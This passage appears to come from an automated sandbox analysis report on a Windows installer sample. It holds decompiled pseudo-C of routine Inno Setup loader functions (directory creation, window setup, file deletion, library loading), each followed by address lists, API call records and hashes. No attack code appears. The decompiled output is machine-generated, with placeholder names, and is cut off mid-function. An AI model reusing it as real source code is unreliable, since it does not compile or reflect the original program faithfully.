				E00407E00(_t73, _v8);
				__eflags = 0;
				_pop(_t63);
				 *[fs:eax] = _t63;
				_push(E004AF0E8);
				E00407A80( &_v40, 3);
				return E00407A80( &_v16, 3);
			}


















                                                                    0x004aefe8
                                                                    0x004aefe8
                                                                    0x004aefe9
                                                                    0x004aefeb
                                                                    0x004aeff0
                                                                    0x004aeff0
                                                                    0x004aeff2
                                                                    0x004aeff4
                                                                    0x004aeff4
                                                                    0x004aeff7
                                                                    0x004aeff8
                                                                    0x004aeffa
                                                                    0x004aeffc
                                                                    0x004aeffe
                                                                    0x004aefff
                                                                    0x004af004
                                                                    0x004af007
                                                                    0x004af00a
                                                                    0x004af011
                                                                    0x004af019
                                                                    0x004af020
                                                                    0x004af030
                                                                    0x004af037
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x004af03e
                                                                    0x004af040
                                                                    0x004af046
                                                                    0x004af056
                                                                    0x004af05e
                                                                    0x004af06a
                                                                    0x004af072
                                                                    0x004af07a
                                                                    0x004af082
                                                                    0x004af091
                                                                    0x004af096
                                                                    0x004af0a0
                                                                    0x004af0a5
                                                                    0x004af0a5
                                                                    0x004af046
                                                                    0x004af0b4
                                                                    0x004af0b9
                                                                    0x004af0bb
                                                                    0x004af0be
                                                                    0x004af0c1
                                                                    0x004af0ce
                                                                    0x004af0e0

                                                                    APIs
                                                                    • CreateDirectoryW.KERNEL32(00000000,00000000,?,00000000,004AF0E1,?,?,?,00000003,00000000,00000000,?,004B619F), ref: 004AF030
                                                                    • GetLastError.KERNEL32(00000000,00000000,?,00000000,004AF0E1,?,?,?,00000003,00000000,00000000,?,004B619F), ref: 004AF039
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000C.00000002.337211101.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000C.00000002.337202126.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000C.00000002.337302256.00000000004B7000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000C.00000002.337318415.00000000004C0000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000C.00000002.337329206.00000000004C4000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000C.00000002.337338314.00000000004C6000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: CreateDirectoryErrorLast
                                                                    • String ID: .tmp
                                                                    • API String ID: 1375471231-2986845003
                                                                    • Opcode ID: b866ae3ac5566b90e4d091c6d0119bd5c5d6e6cd69059738e462e2ab807557f0
                                                                    • Instruction ID: 89b964d67460c442e7c67535b057b8112791baa86db9a38931a927ffd746d2a8
                                                                    • Opcode Fuzzy Hash: b866ae3ac5566b90e4d091c6d0119bd5c5d6e6cd69059738e462e2ab807557f0
                                                                    • Instruction Fuzzy Hash: 3A218735A041089BDB00EBE1C842ADFB3B9EB49304F50447BF800F7381DA386E058BA9
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0040E450, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 44COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 100%
                                                                    			E0040E450(long __eax, WCHAR* __edx, void* _a4, struct HINSTANCE__* _a8, struct HMENU__* _a12, struct HWND__* _a16, int _a20, int _a24, int _a28, int _a32, long _a36) {
				WCHAR* _v8;
				void* _t13;
				struct HWND__* _t24;
				WCHAR* _t29;
				long _t32;

				_v8 = _t29;
				_t32 = __eax;
				_t13 = E00405740();
				_t24 = CreateWindowExW(_t32, __edx, _v8, _a36, _a32, _a28, _a24, _a20, _a16, _a12, _a8, _a4); // executed
				E00405730(_t13);
				return _t24;
			}








                                                                    0x0040e457
                                                                    0x0040e45c
                                                                    0x0040e45e
                                                                    0x0040e48f
                                                                    0x0040e498
                                                                    0x0040e4a4

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000C.00000002.337211101.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000C.00000002.337202126.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000C.00000002.337302256.00000000004B7000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000C.00000002.337318415.00000000004C0000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000C.00000002.337329206.00000000004C4000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000C.00000002.337338314.00000000004C6000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: CreateWindow
                                                                    • String ID: InnoSetupLdrWindow$STATIC
                                                                    • API String ID: 716092398-2209255943
                                                                    • Opcode ID: 4ba199ab3c1e041c72a50ebd66c3ee798d5f8225e8fee486b5eb3d70e3749009
                                                                    • Instruction ID: 770f17d29583ffea265d4876c6cd55b491c436ce5e2cc0b006eebdc9bc405b2a
                                                                    • Opcode Fuzzy Hash: 4ba199ab3c1e041c72a50ebd66c3ee798d5f8225e8fee486b5eb3d70e3749009
                                                                    • Instruction Fuzzy Hash: 73F07FB6600118AF9B84DE9EDC85E9B77ECEB4D264B05412ABA08E7201D634ED118BA4
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 004AF1B4, Relevance: 5.0, APIs: 4, Instructions: 45sleepCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 100%
                                                                    			E004AF1B4(long __eax, intOrPtr __edx, long _a4, long _a8) {
				intOrPtr _v8;
				long _t5;
				long _t9;
				void* _t10;
				void* _t13;
				void* _t15;
				void* _t16;

				_t5 = __eax;
				_v8 = __edx;
				_t9 = __eax;
				_t15 = _t10 - 1;
				if(_t15 < 0) {
					L10:
					return _t5;
				}
				_t16 = _t15 + 1;
				_t13 = 0;
				while(1) {
					_t19 = _t13 - 1;
					if(_t13 != 1) {
						__eflags = _t13 - 1;
						if(__eflags > 0) {
							Sleep(_a4);
						}
					} else {
						Sleep(_a8);
					}
					_t5 = E00427154(_t9, _v8, _t19); // executed
					if(_t5 != 0) {
						goto L10;
					}
					_t5 = GetLastError();
					if(_t5 == 2) {
						goto L10;
					}
					_t5 = GetLastError();
					if(_t5 == 3) {
						goto L10;
					}
					_t13 = _t13 + 1;
					_t16 = _t16 - 1;
					if(_t16 != 0) {
						continue;
					}
					goto L10;
				}
				goto L10;
			}










                                                                    0x004af1b4
                                                                    0x004af1bb
                                                                    0x004af1be
                                                                    0x004af1c2
                                                                    0x004af1c5
                                                                    0x004af213
                                                                    0x004af213
                                                                    0x004af213
                                                                    0x004af1c7
                                                                    0x004af1c8
                                                                    0x004af1ca
                                                                    0x004af1ca
                                                                    0x004af1cd
                                                                    0x004af1da
                                                                    0x004af1dd
                                                                    0x004af1e3
                                                                    0x004af1e3
                                                                    0x004af1cf
                                                                    0x004af1d3
                                                                    0x004af1d3
                                                                    0x004af1ed
                                                                    0x004af1f4
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x004af1f6
                                                                    0x004af1fe
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x004af200
                                                                    0x004af208
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x004af20a
                                                                    0x004af20b
                                                                    0x004af20c
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x004af20c
                                                                    0x00000000

                                                                    APIs
                                                                    • Sleep.KERNEL32(?,?,?,?,0000000D,?,004B64EC,000000FA,00000032,004B6554), ref: 004AF1D3
                                                                    • Sleep.KERNEL32(?,?,?,?,0000000D,?,004B64EC,000000FA,00000032,004B6554), ref: 004AF1E3
                                                                    • GetLastError.KERNEL32(?,?,?,0000000D,?,004B64EC,000000FA,00000032,004B6554), ref: 004AF1F6
                                                                    • GetLastError.KERNEL32(?,?,?,0000000D,?,004B64EC,000000FA,00000032,004B6554), ref: 004AF200
                                                                    Memory Dump Source
                                                                    • Source File: 0000000C.00000002.337211101.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000C.00000002.337202126.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000C.00000002.337302256.00000000004B7000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000C.00000002.337318415.00000000004C0000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000C.00000002.337329206.00000000004C4000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000C.00000002.337338314.00000000004C6000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: ErrorLastSleep
                                                                    • String ID:
                                                                    • API String ID: 1458359878-0
                                                                    • Opcode ID: 132a67e1d44d9774a6928004e5d8cee8820d44842addde93f31c36794548402b
                                                                    • Instruction ID: c6a2870ed3ca6a3ef6dac7de38143878fdab2d33d6efdb0808b7300bb595a527
                                                                    • Opcode Fuzzy Hash: 132a67e1d44d9774a6928004e5d8cee8820d44842addde93f31c36794548402b
                                                                    • Instruction Fuzzy Hash: 0CF02B37B04224A76724A5EBEC46D6FE298DEB33A8710457BFC04D7302C439CC4542A8
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0041FF94, Relevance: 4.6, APIs: 3, Instructions: 93COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 63%
                                                                    			E0041FF94(void* __eax, void* __ebx, signed int* __ecx, signed int* __edx, void* __edi, void* __esi, signed int* _a4) {
				char _v8;
				char _v9;
				int _v16;
				void* _v20;
				void* _v24;
				int _v28;
				int _t33;
				int _t43;
				int _t64;
				intOrPtr _t72;
				intOrPtr _t74;
				signed int* _t77;
				signed int* _t79;
				void* _t81;
				void* _t82;
				intOrPtr _t83;

				_t81 = _t82;
				_t83 = _t82 + 0xffffffe8;
				_v8 = 0;
				_t77 = __ecx;
				_t79 = __edx;
				_push(_t81);
				_push(0x420094);
				_push( *[fs:eax]);
				 *[fs:eax] = _t83;
				_v9 = 0;
				E00407E48( &_v8, __eax);
				E00407FB0( &_v8);
				_t33 = GetFileVersionInfoSizeW(E004084EC(_v8),  &_v16); // executed
				_t64 = _t33;
				if(_t64 == 0) {
					_pop(_t72);
					 *[fs:eax] = _t72;
					_push(0x42009b);
					return E00407A20( &_v8);
				} else {
					_v20 = E004053F0(_t64);
					_push(_t81);
					_push(0x420077);
					_push( *[fs:edx]);
					 *[fs:edx] = _t83;
					_t43 = GetFileVersionInfoW(E004084EC(_v8), _v16, _t64, _v20); // executed
					if(_t43 != 0 && VerQueryValueW(_v20, 0x4200a8,  &_v24,  &_v28) != 0) {
						 *_t79 =  *(_v24 + 0x10) >> 0x00000010 & 0x0000ffff;
						 *_t77 =  *(_v24 + 0x10) & 0x0000ffff;
						 *_a4 =  *(_v24 + 0x14) >> 0x00000010 & 0x0000ffff;
						_v9 = 1;
					}
					_pop(_t74);
					 *[fs:eax] = _t74;
					_push(0x42007e);
					return E0040540C(_v20);
				}
			}



















                                                                    0x0041ff95
                                                                    0x0041ff97
                                                                    0x0041ff9f
                                                                    0x0041ffa2
                                                                    0x0041ffa4
                                                                    0x0041ffaa
                                                                    0x0041ffab
                                                                    0x0041ffb0
                                                                    0x0041ffb3
                                                                    0x0041ffb6
                                                                    0x0041ffbf
                                                                    0x0041ffc7
                                                                    0x0041ffd9
                                                                    0x0041ffde
                                                                    0x0041ffe2
                                                                    0x00420080
                                                                    0x00420083
                                                                    0x00420086
                                                                    0x00420093
                                                                    0x0041ffe8
                                                                    0x0041ffef
                                                                    0x0041fff4
                                                                    0x0041fff5
                                                                    0x0041fffa
                                                                    0x0041fffd
                                                                    0x00420012
                                                                    0x00420019
                                                                    0x00420041
                                                                    0x0042004a
                                                                    0x0042005b
                                                                    0x0042005d
                                                                    0x0042005d
                                                                    0x00420063
                                                                    0x00420066
                                                                    0x00420069
                                                                    0x00420076
                                                                    0x00420076

                                                                    APIs
                                                                    • GetFileVersionInfoSizeW.VERSION(00000000,?,00000000,00420094), ref: 0041FFD9
                                                                    • GetFileVersionInfoW.VERSION(00000000,?,00000000,?,00000000,00420077,?,00000000,?,00000000,00420094), ref: 00420012
                                                                    • VerQueryValueW.VERSION(?,004200A8,?,?,00000000,?,00000000,?,00000000,00420077,?,00000000,?,00000000,00420094), ref: 0042002C
                                                                    Memory Dump Source
                                                                    • Source File: 0000000C.00000002.337211101.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000C.00000002.337202126.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000C.00000002.337302256.00000000004B7000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000C.00000002.337318415.00000000004C0000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000C.00000002.337329206.00000000004C4000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000C.00000002.337338314.00000000004C6000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: FileInfoVersion$QuerySizeValue
                                                                    • String ID:
                                                                    • API String ID: 2179348866-0
                                                                    • Opcode ID: db1b7188df03ba7b3b32e0e3197f16d1bbb1710ebdecda22b0e2c2fca2e7d661
                                                                    • Instruction ID: 087fa93cc02b824bee97242c1a4c1e6fbe52d07f241be95d6751b2a9bfa32856
                                                                    • Opcode Fuzzy Hash: db1b7188df03ba7b3b32e0e3197f16d1bbb1710ebdecda22b0e2c2fca2e7d661
                                                                    • Instruction Fuzzy Hash: 19314771A042199FD710DFA9D941DAFB7F8EB48700B91447AF944E3252D778DD00C765
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0040B110, Relevance: 3.1, APIs: 2, Instructions: 93COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 72%
                                                                    			E0040B110(intOrPtr __eax, void* __ebx, signed int __ecx, signed int __edx, void* __edi, void* __esi) {
				intOrPtr _v8;
				signed int _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				signed int _t41;
				signed short _t43;
				signed short _t46;
				signed int _t60;
				intOrPtr _t68;
				void* _t79;
				signed int* _t81;
				intOrPtr _t84;

				_t79 = __edi;
				_t61 = __ecx;
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(__ebx);
				_push(__esi);
				_t81 = __ecx;
				_v12 = __edx;
				_v8 = __eax;
				E00407B04(_v8);
				E00407B04(_v12);
				_push(_t84);
				_push(0x40b227);
				_push( *[fs:eax]);
				 *[fs:eax] = _t84;
				E00407A20(__ecx);
				if(_v12 == 0) {
					L14:
					_pop(_t68);
					 *[fs:eax] = _t68;
					_push(E0040B22E);
					return E00407A80( &_v28, 6);
				}
				E00407E48( &_v20, _v12);
				_t41 = _v12;
				if(_t41 != 0) {
					_t41 =  *(_t41 - 4);
				}
				_t60 = _t41;
				if(_t60 < 1) {
					L7:
					_t43 = E0040AE34(_v8, _t60, _t61,  &_v16, _t81); // executed
					if(_v16 == 0) {
						L00403730();
						E0040A7E4(_t43, _t60,  &_v24, _t79, _t81);
						_t46 = E0040AF60(_v20, _t60, _t81, _v24, _t79, _t81); // executed
						__eflags =  *_t81;
						if( *_t81 == 0) {
							__eflags =  *0x4bdc0c;
							if( *0x4bdc0c == 0) {
								L00403738();
								E0040A7E4(_t46, _t60,  &_v28, _t79, _t81);
								E0040AF60(_v20, _t60, _t81, _v28, _t79, _t81);
							}
						}
						__eflags =  *_t81;
						if(__eflags == 0) {
							E0040B044(_v20, _t60, _t81, __eflags); // executed
						}
					} else {
						E0040AF60(_v20, _t60, _t81, _v16, _t79, _t81);
					}
					goto L14;
				}
				while( *((short*)(_v12 + _t60 * 2 - 2)) != 0x2e) {
					_t60 = _t60 - 1;
					__eflags = _t60;
					if(_t60 != 0) {
						continue;
					}
					goto L7;
				}
				_t61 = _t60;
				E004088AC(_v12, _t60, 1,  &_v20);
				goto L7;
			}

















                                                                    0x0040b110
                                                                    0x0040b110
                                                                    0x0040b113
                                                                    0x0040b115
                                                                    0x0040b117
                                                                    0x0040b119
                                                                    0x0040b11b
                                                                    0x0040b11d
                                                                    0x0040b11f
                                                                    0x0040b120
                                                                    0x0040b121
                                                                    0x0040b123
                                                                    0x0040b126
                                                                    0x0040b12c
                                                                    0x0040b134
                                                                    0x0040b13b
                                                                    0x0040b13c
                                                                    0x0040b141
                                                                    0x0040b144
                                                                    0x0040b149
                                                                    0x0040b152
                                                                    0x0040b20c
                                                                    0x0040b20e
                                                                    0x0040b211
                                                                    0x0040b214
                                                                    0x0040b226
                                                                    0x0040b226
                                                                    0x0040b15e
                                                                    0x0040b163
                                                                    0x0040b168
                                                                    0x0040b16d
                                                                    0x0040b16d
                                                                    0x0040b16f
                                                                    0x0040b174
                                                                    0x0040b19b
                                                                    0x0040b1a1
                                                                    0x0040b1aa
                                                                    0x0040b1bb
                                                                    0x0040b1c3
                                                                    0x0040b1d0
                                                                    0x0040b1d5
                                                                    0x0040b1d8
                                                                    0x0040b1da
                                                                    0x0040b1e1
                                                                    0x0040b1e3
                                                                    0x0040b1eb
                                                                    0x0040b1f8
                                                                    0x0040b1f8
                                                                    0x0040b1e1
                                                                    0x0040b1fd
                                                                    0x0040b200
                                                                    0x0040b207
                                                                    0x0040b207
                                                                    0x0040b1ac
                                                                    0x0040b1b4
                                                                    0x0040b1b4
                                                                    0x00000000
                                                                    0x0040b1aa
                                                                    0x0040b176
                                                                    0x0040b196
                                                                    0x0040b197
                                                                    0x0040b199
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0040b199
                                                                    0x0040b185
                                                                    0x0040b18f
                                                                    0x00000000

                                                                    APIs
                                                                    • GetUserDefaultUILanguage.KERNEL32(00000000,0040B227,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,0040B2AE,00000000,?,00000105), ref: 0040B1BB
                                                                    • GetSystemDefaultUILanguage.KERNEL32(00000000,0040B227,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,0040B2AE,00000000,?,00000105), ref: 0040B1E3
                                                                    Memory Dump Source
                                                                    • Source File: 0000000C.00000002.337211101.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000C.00000002.337202126.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000C.00000002.337302256.00000000004B7000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000C.00000002.337318415.00000000004C0000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000C.00000002.337329206.00000000004C4000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000C.00000002.337338314.00000000004C6000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: DefaultLanguage$SystemUser
                                                                    • String ID:
                                                                    • API String ID: 384301227-0
                                                                    • Opcode ID: 8091743a5a45bbad2069f173d476493d8776fa257b9783c2651a700d4e0e0a8f
                                                                    • Instruction ID: e5bcb09f7540d0846d638ab8db7cc306f2a88a3609992180fc1e837192b0f5a6
                                                                    • Opcode Fuzzy Hash: 8091743a5a45bbad2069f173d476493d8776fa257b9783c2651a700d4e0e0a8f
                                                                    • Instruction Fuzzy Hash: B0313070A142499BDB10EBA5C891AAEB7B5EF48304F50857BE400B73D1DB7CAD41CB9E
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0040B234, Relevance: 3.1, APIs: 2, Instructions: 55libraryCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 58%
                                                                    			E0040B234(void* __eax, void* __ebx, void* __edi, void* __esi, void* __eflags) {
				char _v8;
				short _v530;
				char _v536;
				char _v540;
				void* _t44;
				intOrPtr _t45;
				void* _t49;
				void* _t52;

				_v536 = 0;
				_v540 = 0;
				_v8 = 0;
				_t49 = __eax;
				_push(_t52);
				_push(0x40b2ee);
				_push( *[fs:eax]);
				 *[fs:eax] = _t52 + 0xfffffde8;
				GetModuleFileNameW(0,  &_v530, 0x105);
				E00408550( &_v536, _t49);
				_push(_v536);
				E0040858C( &_v540, 0x105,  &_v530);
				_pop(_t44); // executed
				E0040B110(_v540, 0,  &_v8, _t44, __edi, _t49); // executed
				if(_v8 != 0) {
					LoadLibraryExW(E004084EC(_v8), 0, 2);
				}
				_pop(_t45);
				 *[fs:eax] = _t45;
				_push(E0040B2F5);
				E00407A80( &_v540, 2);
				return E00407A20( &_v8);
			}











                                                                    0x0040b241
                                                                    0x0040b247
                                                                    0x0040b24d
                                                                    0x0040b250
                                                                    0x0040b254
                                                                    0x0040b255
                                                                    0x0040b25a
                                                                    0x0040b25d
                                                                    0x0040b270
                                                                    0x0040b27d
                                                                    0x0040b288
                                                                    0x0040b29a
                                                                    0x0040b2a8
                                                                    0x0040b2a9
                                                                    0x0040b2b2
                                                                    0x0040b2c1
                                                                    0x0040b2c6
                                                                    0x0040b2ca
                                                                    0x0040b2cd
                                                                    0x0040b2d0
                                                                    0x0040b2e0
                                                                    0x0040b2ed

                                                                    APIs
                                                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000105,00000000,0040B2EE,?,?,00000000), ref: 0040B270
                                                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000002,00000000,?,00000105,00000000,0040B2EE,?,?,00000000), ref: 0040B2C1
                                                                    Memory Dump Source
                                                                    • Source File: 0000000C.00000002.337211101.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000C.00000002.337202126.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000C.00000002.337302256.00000000004B7000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000C.00000002.337318415.00000000004C0000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000C.00000002.337329206.00000000004C4000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000C.00000002.337338314.00000000004C6000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: FileLibraryLoadModuleName
                                                                    • String ID:
                                                                    • API String ID: 1159719554-0
                                                                    • Opcode ID: c89eb0a175d0b8486c29a163bc28afc1dff8206c8c77fc3926f93841ada109dc
                                                                    • Instruction ID: c66d7809fa1512833e1e01641763b0ecb7dd00f0751393a0e64d94d028879d96
                                                                    • Opcode Fuzzy Hash: c89eb0a175d0b8486c29a163bc28afc1dff8206c8c77fc3926f93841ada109dc
                                                                    • Instruction Fuzzy Hash: 35116070A4421CABDB10EB55CD86BDE77B8DB04304F5144BEE508B32C1DA785F848AA9
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00427154, Relevance: 3.0, APIs: 2, Instructions: 42fileCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 60%
                                                                    			E00427154(void* __eax, void* __edx, void* __eflags) {
				int _v8;
				char _v16;
				long _v20;
				int _t13;
				intOrPtr _t27;
				void* _t32;
				void* _t34;
				intOrPtr _t35;

				_t32 = _t34;
				_t35 = _t34 + 0xfffffff0;
				if(E00427108(__eax,  &_v16) != 0) {
					_push(_t32);
					_push(0x4271b1);
					_push( *[fs:eax]);
					 *[fs:eax] = _t35;
					_t13 = DeleteFileW(E004084EC(__edx)); // executed
					_v8 = _t13;
					_v20 = GetLastError();
					_pop(_t27);
					 *[fs:eax] = _t27;
					_push(E004271B8);
					return E00427144( &_v16);
				} else {
					_v8 = 0;
					return _v8;
				}
			}











                                                                    0x00427155
                                                                    0x00427157
                                                                    0x0042716c
                                                                    0x00427177
                                                                    0x00427178
                                                                    0x0042717d
                                                                    0x00427180
                                                                    0x0042718b
                                                                    0x00427190
                                                                    0x00427198
                                                                    0x0042719d
                                                                    0x004271a0
                                                                    0x004271a3
                                                                    0x004271b0
                                                                    0x0042716e
                                                                    0x00427170
                                                                    0x004271c9
                                                                    0x004271c9

                                                                    APIs
                                                                    • DeleteFileW.KERNEL32(00000000,00000000,004271B1,?,0000000D,00000000), ref: 0042718B
                                                                    • GetLastError.KERNEL32(00000000,00000000,004271B1,?,0000000D,00000000), ref: 00427193
                                                                    Memory Dump Source
                                                                    • Source File: 0000000C.00000002.337211101.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000C.00000002.337202126.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000C.00000002.337302256.00000000004B7000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000C.00000002.337318415.00000000004C0000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000C.00000002.337329206.00000000004C4000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000C.00000002.337338314.00000000004C6000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: DeleteErrorFileLast
                                                                    • String ID:
                                                                    • API String ID: 2018770650-0
                                                                    • Opcode ID: 6bce5fda464dbdacec63520f594f5bcb5d9fb2b97579abb83185b4526990ec2d
                                                                    • Instruction ID: b2b9a58b343adce66678156e8009272800f6ed28378062f2bcdc1a6b1bb3db77
                                                                    • Opcode Fuzzy Hash: 6bce5fda464dbdacec63520f594f5bcb5d9fb2b97579abb83185b4526990ec2d
                                                                    • Instruction Fuzzy Hash: 7AF0C831B08228ABDB01EFB5AC424AEB7E8DF0971479149BBE804E3341E6395D209698
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00421230, Relevance: 3.0, APIs: 2, Instructions: 33libraryCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 37%
                                                                    			E00421230(void* __eax, void* __ebx, int __edx) {
				struct HINSTANCE__* _v12;
				int _v16;
				int _t4;
				struct HINSTANCE__* _t9;
				void* _t12;
				intOrPtr _t16;
				void* _t18;
				void* _t19;
				intOrPtr _t20;

				_t18 = _t19;
				_t20 = _t19 + 0xfffffff4;
				_t12 = __eax;
				_t4 = SetErrorMode(__edx); // executed
				_v16 = _t4;
				_push(_t18);
				_push(0x4212a2);
				_push( *[fs:eax]);
				 *[fs:eax] = _t20;
				asm("fnstcw word [ebp-0x2]");
				_push(_t18);
				_push(0x421284);
				_push( *[fs:eax]);
				 *[fs:eax] = _t20;
				_t9 = LoadLibraryW(E004084EC(_t12)); // executed
				_v12 = _t9;
				_pop(_t16);
				 *[fs:eax] = _t16;
				_push(0x42128b);
				asm("fclex");
				asm("fldcw word [ebp-0x2]");
				return 0;
			}












                                                                    0x00421231
                                                                    0x00421233
                                                                    0x00421237
                                                                    0x0042123a
                                                                    0x0042123f
                                                                    0x00421244
                                                                    0x00421245
                                                                    0x0042124a
                                                                    0x0042124d
                                                                    0x00421250
                                                                    0x00421255
                                                                    0x00421256
                                                                    0x0042125b
                                                                    0x0042125e
                                                                    0x00421269
                                                                    0x0042126e
                                                                    0x00421273
                                                                    0x00421276
                                                                    0x00421279
                                                                    0x0042127e
                                                                    0x00421280
                                                                    0x00421283

                                                                    APIs
                                                                    • SetErrorMode.KERNEL32 ref: 0042123A
                                                                    • LoadLibraryW.KERNEL32(00000000,00000000,00421284,?,00000000,004212A2), ref: 00421269
                                                                    Memory Dump Source
                                                                    • Source File: 0000000C.00000002.337211101.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000C.00000002.337202126.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000C.00000002.337302256.00000000004B7000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000C.00000002.337318415.00000000004C0000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000C.00000002.337329206.00000000004C4000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000C.00000002.337338314.00000000004C6000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: ErrorLibraryLoadMode
                                                                    • String ID:
                                                                    • API String ID: 2987862817-0
                                                                    • Opcode ID: 5d62b3fe4766baadd73c675683546c7f58e01c4ce11fe1a914dda1a55ed8f36c
                                                                    • Instruction ID: 4174928c950a8c4d8a753a2a73b5e5f46ee32f9a8ef6f103d2b3a03bcfaff51e
                                                                    • Opcode Fuzzy Hash: 5d62b3fe4766baadd73c675683546c7f58e01c4ce11fe1a914dda1a55ed8f36c
                                                                    • Instruction Fuzzy Hash: 15F08270A14744BFDB115F779C5282BBAACE709B047A348BAF800F2691E53C48208574
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 004052D4, Relevance: 2.6, APIs: 2, Instructions: 63COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 100%
                                                                    			E004052D4() {
				intOrPtr _t13;
				intOrPtr* _t14;
				int _t18;
				intOrPtr* _t23;
				void* _t25;
				void* _t26;
				void* _t28;
				void* _t31;

				_t28 =  *0x004BBADC;
				while(_t28 != 0x4bbad8) {
					_t2 = _t28 + 4; // 0x4bbad8
					VirtualFree(_t28, 0, 0x8000); // executed
					_t28 =  *_t2;
				}
				_t25 = 0x37;
				_t13 = 0x4b7080;
				do {
					 *((intOrPtr*)(_t13 + 0xc)) = _t13;
					 *((intOrPtr*)(_t13 + 8)) = _t13;
					 *((intOrPtr*)(_t13 + 0x10)) = 1;
					 *((intOrPtr*)(_t13 + 0x14)) = 0;
					_t13 = _t13 + 0x20;
					_t25 = _t25 - 1;
				} while (_t25 != 0);
				 *0x4bbad8 = 0x4bbad8;
				 *0x004BBADC = 0x4bbad8;
				_t26 = 0x400;
				_t23 = 0x4bbb78;
				do {
					_t14 = _t23;
					 *_t14 = _t14;
					_t8 = _t14 + 4; // 0x4bbb78
					 *_t8 = _t14;
					_t23 = _t23 + 8;
					_t26 = _t26 - 1;
				} while (_t26 != 0);
				 *0x4bbaf4 = 0;
				E00405884(0x4bbaf8, 0x80);
				_t18 = 0;
				 *0x4bbaf0 = 0;
				_t31 =  *0x004BDB80;
				while(_t31 != 0x4bdb7c) {
					_t10 = _t31 + 4; // 0x4bdb7c
